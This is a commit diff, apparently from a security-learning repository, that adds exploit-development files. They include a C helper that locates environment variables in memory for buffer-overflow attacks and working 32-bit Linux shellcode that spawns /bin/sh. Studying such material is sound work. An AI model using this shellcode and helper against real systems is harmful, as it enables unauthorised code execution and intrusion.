some small fixes

2025-04-27 19:16:08 -04:00 · 2014-10-07 12:09:02 -04:00 · 2014-10-07 12:09:02 -04:00 · baee235c69
commit baee235c69
parent 9df63fa0ec
6 changed files with 1064 additions and 0 deletions
--- a/Memory_Exploits/README1.md
+++ b/Memory_Exploits/README1.md
--- a/Memory_Exploits/RUNNING_ASM.md
+++ b/Memory_Exploits/RUNNING_ASM.md
@ -0,0 +1 @@
+nasm shellspawn.asm
--- a/Memory_Exploits/getshadd.c
+++ b/Memory_Exploits/getshadd.c
@ -0,0 +1,12 @@
+// usage: ./getshadd ENVVAR BINARY
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+int main(int argc,char *argv[]){
+        char *ptr;
+        ptr=getenv(argv[1]);
+        ptr+=(strlen(argv[0])-strlen(argv[2]))*2;
+        printf("%s will be at %p\n",argv[1],ptr);
+        return 0;
+}
--- a/Memory_Exploits/shellspawn.asm
+++ b/Memory_Exploits/shellspawn.asm
@ -0,0 +1,14 @@
+BITS 32
+
+xor eax, eax        ; zero eax
+push eax            ; null terminate the string
+push 0x68732f2f     ; push //sh (// is same as / for our purpose)
+push 0x6e69622f     ; push /bin
+mov ebx, esp        ; pass first argument using ebx
+push eax            ; third argument is empty
+mov edx, esp
+push eax            ; second argument is empty
+mov ecx, esp
+mov al, 11          ; execve is system call #11
+int 0x80            ; issue an interrupt
+
--- a/OS_Injections/ShellShocker/file.txt
+++ b/OS_Injections/ShellShocker/file.txt
@ -0,0 +1,2 @@
+bash can be super fun
+bash can be dangerous
--- a/OS_Injections/ShellShocker/header.png
+++ b/OS_Injections/ShellShocker/header.png